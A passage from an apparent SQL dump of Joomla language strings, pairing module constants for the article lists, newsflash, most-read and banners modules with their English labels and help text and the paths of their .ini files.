Type.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2097,'MOD_ARTICLES_CATEGORY_FIELD_DATEFILTERING_LABEL','Date Filtering','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2098,'MOD_ARTICLES_CATEGORY_FIELD_DATEGROUPINGFIELD_DESC','Select which date field you want the date grouping to be applied to.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2099,'MOD_ARTICLES_CATEGORY_FIELD_DATEGROUPINGFIELD_LABEL','Date Grouping Field','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2100,'MOD_ARTICLES_CATEGORY_FIELD_ENDDATE_DESC','Please enter an End Date.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2101,'MOD_ARTICLES_CATEGORY_FIELD_ENDDATE_LABEL','To Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2102,'MOD_ARTICLES_CATEGORY_FIELD_EXCLUDEDARTICLES_DESC','Please enter each Article ID on a new line.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2103,'MOD_ARTICLES_CATEGORY_FIELD_EXCLUDEDARTICLES_LABEL','Article IDs to Exclude','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2104,'MOD_ARTICLES_CATEGORY_FIELD_GROUP_DISPLAY_LABEL','Display Options','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2105,'MOD_ARTICLES_CATEGORY_FIELD_GROUP_DYNAMIC_LABEL','Dynamic Mode Options','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2106,'MOD_ARTICLES_CATEGORY_FIELD_GROUP_FILTERING_LABEL','Filtering Options','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2107,'MOD_ARTICLES_CATEGORY_FIELD_GROUP_GROUPING_LABEL','Grouping Options','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2108,'MOD_ARTICLES_CATEGORY_FIELD_GROUP_ORDERING_LABEL','Ordering Options','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2109,'MOD_ARTICLES_CATEGORY_FIELD_INTROTEXTLIMIT_DESC','Please enter in a numeric character limit value. The introtext will be trimmed to the number of characters you enter.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2110,'MOD_ARTICLES_CATEGORY_FIELD_INTROTEXTLIMIT_LABEL','Introtext Limit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2111,'MOD_ARTICLES_CATEGORY_FIELD_LINKTITLES_LABEL','Linked Titles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2112,'MOD_ARTICLES_CATEGORY_FIELD_LINKTITLES_DESC','Linked titles.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2113,'MOD_ARTICLES_CATEGORY_FIELD_MODE_DESC','Please select the mode you would like to use. If Normal Mode is chosen, then configure the module and it will display a static list of Articles on the menu items you assign the module to. If Dynamic Mode is chosen, then you can still configure the module normally, however now the Category option will no longer be used. Instead, the module will dynamically detect if you are on a Category view and will display the list of articles within that Category. When Dynamic Mode is chosen, it is best to leave the module set to display on all pages, as it will decide to display anything dynamically.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2114,'MOD_ARTICLES_CATEGORY_FIELD_MODE_LABEL','Mode','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2115,'MOD_ARTICLES_CATEGORY_FIELD_MONTHYEARFORMAT_DESC','Please enter in a valid date format. See: https://php.net/date for formatting information.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2116,'MOD_ARTICLES_CATEGORY_FIELD_MONTHYEARFORMAT_LABEL','Month and Year Display Format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2117,'MOD_ARTICLES_CATEGORY_FIELD_RELATIVEDATE_DESC','Please enter a numeric value. Results will be retrieved relative to the current date and the value you enter.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2118,'MOD_ARTICLES_CATEGORY_FIELD_RELATIVEDATE_LABEL','Relative Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2119,'MOD_ARTICLES_CATEGORY_FIELD_SHOWAUTHOR_DESC','Select Show if you would like the author (or author alias instead, if available) to be displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2120,'MOD_ARTICLES_CATEGORY_FIELD_SHOWCATEGORY_DESC','Select Show if you would like the category name displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2121,'MOD_ARTICLES_CATEGORY_FIELD_SHOWCHILDCATEGORYARTICLES_DESC','Include or Exclude Articles from Child Categories.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2122,'MOD_ARTICLES_CATEGORY_FIELD_SHOWCHILDCATEGORYARTICLES_LABEL','Child Category Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2123,'MOD_ARTICLES_CATEGORY_FIELD_SHOWDATE_DESC','Select Show if you would like the date displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2124,'MOD_ARTICLES_CATEGORY_FIELD_SHOWFEATURED_DESC','Select to Show, Hide, or Only display Featured Articles.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2125,'MOD_ARTICLES_CATEGORY_FIELD_SHOWFEATURED_LABEL','Featured Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2126,'MOD_ARTICLES_CATEGORY_FIELD_SHOWHITS_DESC','Select Show if you would like the hits for each article to be displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2127,'MOD_ARTICLES_CATEGORY_FIELD_SHOWHITS_LABEL','Hits','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2128,'MOD_ARTICLES_CATEGORY_FIELD_SHOWINTROTEXT_DESC','Select Show if you would like the introtext to be displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2129,'MOD_ARTICLES_CATEGORY_FIELD_SHOWINTROTEXT_LABEL','Introtext','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2130,'MOD_ARTICLES_CATEGORY_FIELD_SHOWONARTICLEPAGE_DESC','Select to Show or hide Article List from Article Pages. This means that the module will only display itself dynamically on Category Pages.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2131,'MOD_ARTICLES_CATEGORY_FIELD_SHOWONARTICLEPAGE_LABEL','Show on Article Page','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2132,'MOD_ARTICLES_CATEGORY_FIELD_SHOWTAGS_DESC','Show the tags for each article.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2133,'MOD_ARTICLES_CATEGORY_FIELD_STARTDATE_DESC','Please enter a Starting Date.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2134,'MOD_ARTICLES_CATEGORY_FIELD_STARTDATE_LABEL','Start Date Range','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2135,'MOD_ARTICLES_CATEGORY_OPTION_ASCENDING_VALUE','Ascending','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2136,'MOD_ARTICLES_CATEGORY_OPTION_CREATED_VALUE','Created Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2137,'MOD_ARTICLES_CATEGORY_OPTION_DATERANGE_VALUE','Date Range','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2138,'MOD_ARTICLES_CATEGORY_OPTION_DESCENDING_VALUE','Descending','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2139,'MOD_ARTICLES_CATEGORY_OPTION_DYNAMIC_VALUE','Dynamic','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2140,'MOD_ARTICLES_CATEGORY_OPTION_EXCLUDE_VALUE','Exclude','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2141,'MOD_ARTICLES_CATEGORY_OPTION_EXCLUSIVE_VALUE','Exclusive','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2142,'MOD_ARTICLES_CATEGORY_OPTION_HITS_VALUE','Hits','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2143,'MOD_ARTICLES_CATEGORY_OPTION_ID_VALUE','ID','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2144,'MOD_ARTICLES_CATEGORY_OPTION_INCLUDE_VALUE','Include','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2145,'MOD_ARTICLES_CATEGORY_OPTION_INCLUSIVE_VALUE','Inclusive','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2146,'MOD_ARTICLES_CATEGORY_OPTION_MODIFIED_VALUE','Modified Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2147,'MOD_ARTICLES_CATEGORY_OPTION_MONTHYEAR_VALUE','Month and Year','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2148,'MOD_ARTICLES_CATEGORY_OPTION_NORMAL_VALUE','Normal','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2149,'MOD_ARTICLES_CATEGORY_OPTION_OFF_VALUE','Off','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2150,'MOD_ARTICLES_CATEGORY_OPTION_ONLYFEATURED_VALUE','Only','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2151,'MOD_ARTICLES_CATEGORY_OPTION_ORDERING_VALUE','Article Order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2152,'MOD_ARTICLES_CATEGORY_OPTION_ORDERINGFEATURED_VALUE','Featured Articles Order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2153,'MOD_ARTICLES_CATEGORY_OPTION_RANDOM_VALUE','Random','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2154,'MOD_ARTICLES_CATEGORY_OPTION_RATING_VALUE','Rating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2155,'MOD_ARTICLES_CATEGORY_OPTION_RELATIVEDAY_VALUE','Relative Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2156,'MOD_ARTICLES_CATEGORY_OPTION_STARTPUBLISHING_VALUE','Start Publishing Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2157,'MOD_ARTICLES_CATEGORY_OPTION_FINISHPUBLISHING_VALUE','Finish Publishing Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2158,'MOD_ARTICLES_CATEGORY_OPTION_VOTE_VALUE','Vote','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2159,'MOD_ARTICLES_CATEGORY_OPTION_YEAR_VALUE','Year','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2160,'MOD_ARTICLES_CATEGORY_READ_MORE','Read more: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2161,'MOD_ARTICLES_CATEGORY_READ_MORE_TITLE','Read More ...','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2162,'MOD_ARTICLES_CATEGORY_REGISTER_TO_READ_MORE','Register to read more','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2163,'MOD_ARTICLES_CATEGORY_UNTAGGED','Untagged','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2164,'MOD_ARTICLES_CATEGORY_XML_DESCRIPTION','This module displays a list of articles from one or more categories.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2165,'MOD_ARTICLES_CATEGORY','Articles - Category','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.sys.ini'),(2166,'MOD_ARTICLES_CATEGORY_XML_DESCRIPTION','This module displays a list of articles from one or more categories.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.sys.ini'),(2167,'MOD_ARTICLES_CATEGORY_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.sys.ini'),(2168,'MOD_ARTICLES_LATEST','Articles - Latest','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2169,'MOD_LATEST_NEWS_FIELD_AUTHOR_DESC','Select one or more authors.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2170,'MOD_LATEST_NEWS_FIELD_AUTHOR_LABEL','Created by Author(s)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2171,'MOD_LATEST_NEWS_FIELD_CATEGORY_DESC','Selects Articles from one or more Categories. If no selection will show all categories as default.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2172,'MOD_LATEST_NEWS_FIELD_COUNT_DESC','The number of Articles to display (the default is 5).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2173,'MOD_LATEST_NEWS_FIELD_COUNT_LABEL','Count','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2174,'MOD_LATEST_NEWS_FIELD_FEATURED_DESC','Show or hide articles marked as featured.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2175,'MOD_LATEST_NEWS_FIELD_FEATURED_LABEL','Featured Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2176,'MOD_LATEST_NEWS_FIELD_ORDERING_DESC','Recently Added First: order the articles using their creation date<br />Recently Modified First: order the articles using their modification date<br />Recently Published First: order the articles using their publication date.<br />Recently Touched First: order the articles using their modification or creation dates.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2177,'MOD_LATEST_NEWS_FIELD_ORDERING_LABEL','Order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2178,'MOD_LATEST_NEWS_FIELD_USER_DESC','Filter by author.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2179,'MOD_LATEST_NEWS_FIELD_USER_LABEL','Authors','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2180,'MOD_LATEST_NEWS_VALUE_ADDED_BY_ME','Added or modified by me','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2181,'MOD_LATEST_NEWS_VALUE_ANYONE','Anyone','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2182,'MOD_LATEST_NEWS_VALUE_CREATED_BY','Created by','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2183,'MOD_LATEST_NEWS_VALUE_NOTADDED_BY_ME','Not added or modified by me','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2184,'MOD_LATEST_NEWS_VALUE_ONLY_SHOW_FEATURED','Only show Featured Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2185,'MOD_LATEST_NEWS_VALUE_RECENT_ADDED','Recently Added First','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2186,'MOD_LATEST_NEWS_VALUE_RECENT_MODIFIED','Recently Modified First','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2187,'MOD_LATEST_NEWS_VALUE_RECENT_RAND','Random Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2188,'MOD_LATEST_NEWS_VALUE_RECENT_PUBLISHED','Recently Published First','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2189,'MOD_LATEST_NEWS_VALUE_RECENT_TOUCHED','Recently Touched First','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2190,'MOD_LATEST_NEWS_XML_DESCRIPTION','This module shows a list of the most recently published and current Articles.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.ini'),(2191,'MOD_ARTICLES_LATEST','Articles - Latest','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.sys.ini'),(2192,'MOD_LATEST_NEWS_XML_DESCRIPTION','This module shows a list of the most recently published and current Articles.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.sys.ini'),(2193,'MOD_ARTICLES_LATEST_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_latest.sys.ini'),(2194,'MOD_ARTICLES_NEWS','Articles - Newsflash','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2195,'MOD_ARTICLES_NEWS_FIELD_FEATURED_DESC','Show or hide articles marked as featured.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2196,'MOD_ARTICLES_NEWS_FIELD_FEATURED_LABEL','Featured Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2197,'MOD_ARTICLES_NEWS_FIELD_CATEGORY_DESC','Select Articles from a specific Category or a set of Categories. If no selection will show all categories as default.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2198,'MOD_ARTICLES_NEWS_FIELD_IMAGES_ARTICLE_DESC','Display the intro or full image.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2199,'MOD_ARTICLES_NEWS_FIELD_IMAGES_ARTICLE_LABEL','Show Intro/Full Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2200,'MOD_ARTICLES_NEWS_FIELD_IMAGES_DESC','Show the images that are inside the text of the article.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2201,'MOD_ARTICLES_NEWS_FIELD_IMAGES_LABEL','Show Article Images','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2202,'MOD_ARTICLES_NEWS_FIELD_ITEMS_DESC','The number of Articles to display within this module.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2203,'MOD_ARTICLES_NEWS_FIELD_ITEMS_LABEL','Number of Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2204,'MOD_ARTICLES_NEWS_FIELD_LINKTITLE_DESC','Link the Article titles to Articles.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2205,'MOD_ARTICLES_NEWS_FIELD_LINKTITLE_LABEL','Linked Titles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2206,'MOD_ARTICLES_NEWS_FIELD_ORDERING_DESC','Select the order in which you want query results presented.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2207,'MOD_ARTICLES_NEWS_FIELD_ORDERING_LABEL','Order Results','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2208,'MOD_ARTICLES_NEWS_FIELD_ORDERING_CREATED_DATE','Created Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2209,'MOD_ARTICLES_NEWS_FIELD_ORDERING_MODIFIED_DATE','Modified Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2210,'MOD_ARTICLES_NEWS_FIELD_ORDERING_PUBLISHED_DATE','Published Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2211,'MOD_ARTICLES_NEWS_FIELD_ORDERING_ORDERING','Ordering','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2212,'MOD_ARTICLES_NEWS_FIELD_ORDERING_RANDOM','Random','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2213,'MOD_ARTICLES_NEWS_FIELD_READMORE_DESC','If set to Show, the \'Read more ...\' link will show if Main text has been provided for an Article.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2214,'MOD_ARTICLES_NEWS_FIELD_READMORE_LABEL','\'Read more ...\' Link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2215,'MOD_ARTICLES_NEWS_FIELD_SEPARATOR_DESC','Show separator after last Article.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2216,'MOD_ARTICLES_NEWS_FIELD_SEPARATOR_LABEL','Show Last Separator','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2217,'MOD_ARTICLES_NEWS_FIELD_TITLE_DESC','Show or hide the Article title.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2218,'MOD_ARTICLES_NEWS_FIELD_TITLE_LABEL','Show Article Title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2219,'MOD_ARTICLES_NEWS_FIELD_TRIGGEREVENTS_DESC','Triggers additional plugin events to display additional content like custom fields or voting information.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2220,'MOD_ARTICLES_NEWS_FIELD_TRIGGEREVENTS_LABEL','Trigger Plugin Events','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2221,'MOD_ARTICLES_NEWS_FIELD_SHOWINTROTEXT_DESC','Show or hide the article intro text.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2222,'MOD_ARTICLES_NEWS_FIELD_SHOWINTROTEXT_LABEL','Show Intro Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2223,'MOD_ARTICLES_NEWS_OPTION_FULLIMAGE','Full Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2224,'MOD_ARTICLES_NEWS_OPTION_INTROIMAGE','Intro Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2225,'MOD_ARTICLES_NEWS_READMORE','Read more ...','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2226,'MOD_ARTICLES_NEWS_READMORE_REGISTER','Register to Read More','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2227,'MOD_ARTICLES_NEWS_TITLE_HEADING','Header Level','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2228,'MOD_ARTICLES_NEWS_TITLE_HEADING_DESCRIPTION','Select the desired HTML header level for the Article titles.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2229,'MOD_ARTICLES_NEWS_VALUE_ONLY_SHOW_FEATURED','Only show Featured Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2230,'MOD_ARTICLES_NEWS_XML_DESCRIPTION','The Article Newsflash Module will display a fixed number of Articles from a specific Category or a set of Categories.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.ini'),(2231,'MOD_ARTICLES_NEWS','Articles - Newsflash','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.sys.ini'),(2232,'MOD_ARTICLES_NEWS_XML_DESCRIPTION','The Newsflash Module will display a fixed number of articles from a specific category.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.sys.ini'),(2233,'MOD_ARTICLES_NEWS_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_news.sys.ini'),(2234,'MOD_ARTICLES_POPULAR','Articles - Most Read','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2235,'MOD_POPULAR_FIELD_CATEGORY_DESC','Select Articles from a specific Category or a set of Categories. If no selection will show all categories as default.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2236,'MOD_POPULAR_FIELD_COUNT_DESC','The number of Articles to display (the default is 5).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2237,'MOD_POPULAR_FIELD_COUNT_LABEL','Count','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2238,'MOD_POPULAR_FIELD_FEATURED_DESC','Show or hide Articles marked as Featured.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2239,'MOD_POPULAR_FIELD_FEATURED_LABEL','Featured Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2240,'MOD_POPULAR_XML_DESCRIPTION','This module shows a list of the published Articles which have the highest number of page views.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2241,'MOD_POPULAR_FIELD_DATEFIELD_DESC','Select which date field you want the date filter to be applied to.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2242,'MOD_POPULAR_FIELD_DATEFIELD_LABEL','Date Field','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2243,'MOD_POPULAR_FIELD_DATEFILTERING_DESC','Select Date Filtering Type.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2244,'MOD_POPULAR_FIELD_DATEFILTERING_LABEL','Date Filtering','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2245,'MOD_POPULAR_FIELD_ENDDATE_DESC','If Date Range is selected above, please enter an End Date.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2246,'MOD_POPULAR_FIELD_ENDDATE_LABEL','End Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2247,'MOD_POPULAR_FIELD_STARTDATE_DESC','If Date Range is selected above, please enter a Starting Date.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2248,'MOD_POPULAR_FIELD_STARTDATE_LABEL','Start Date Range','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2249,'MOD_POPULAR_FIELD_RELATIVEDATE_DESC','If Relative Date is selected above, please enter a numeric day value. Results will be retrieved relative to the current date and the value you enter.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2250,'MOD_POPULAR_FIELD_RELATIVEDATE_LABEL','Relative Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2251,'MOD_POPULAR_OPTION_CREATED_VALUE','Created Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2252,'MOD_POPULAR_OPTION_DATERANGE_VALUE','Date Range','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2253,'MOD_POPULAR_OPTION_MODIFIED_VALUE','Modified Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2254,'MOD_POPULAR_OPTION_OFF_VALUE','Off','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2255,'MOD_POPULAR_OPTION_RELATIVEDAY_VALUE','Relative Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2256,'MOD_POPULAR_OPTION_STARTPUBLISHING_VALUE','Start Publishing Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.ini'),(2257,'MOD_ARTICLES_POPULAR','Articles - Most Read','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.sys.ini'),(2258,'MOD_POPULAR_XML_DESCRIPTION','This module shows a list of the published Articles which have the highest number of page views.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.sys.ini'),(2259,'MOD_ARTICLES_POPULAR_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_popular.sys.ini'),(2260,'COM_BANNERS_NO_CLIENT','- No client -','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2261,'MOD_BANNERS','Banners','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2262,'MOD_BANNERS_BANNER','Banner','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2263,'MOD_BANNERS_FIELD_BANNERCLIENT_DESC','Select banners only from a single client.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2264,'MOD_BANNERS_FIELD_BANNERCLIENT_LABEL','Client','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2265,'MOD_BANNERS_FIELD_CACHETIME_DESC','The time before the module is recached.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2266,'MOD_BANNERS_FIELD_CACHETIME_LABEL','Cache Time','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2267,'MOD_BANNERS_FIELD_CATEGORY_DESC','Select banners from a specific Category or a set of Categories. If no selection then it will show all categories as default.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2268,'MOD_BANNERS_FIELD_COUNT_DESC','The number of banners to display (default 5).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2269,'MOD_BANNERS_FIELD_COUNT_LABEL','Count','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2270,'MOD_BANNERS_FIELD_FOOTER_DESC','Text or HTML to display after the group of banners.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2271,'MOD_BANNERS_FIELD_FOOTER_LABEL','Footer 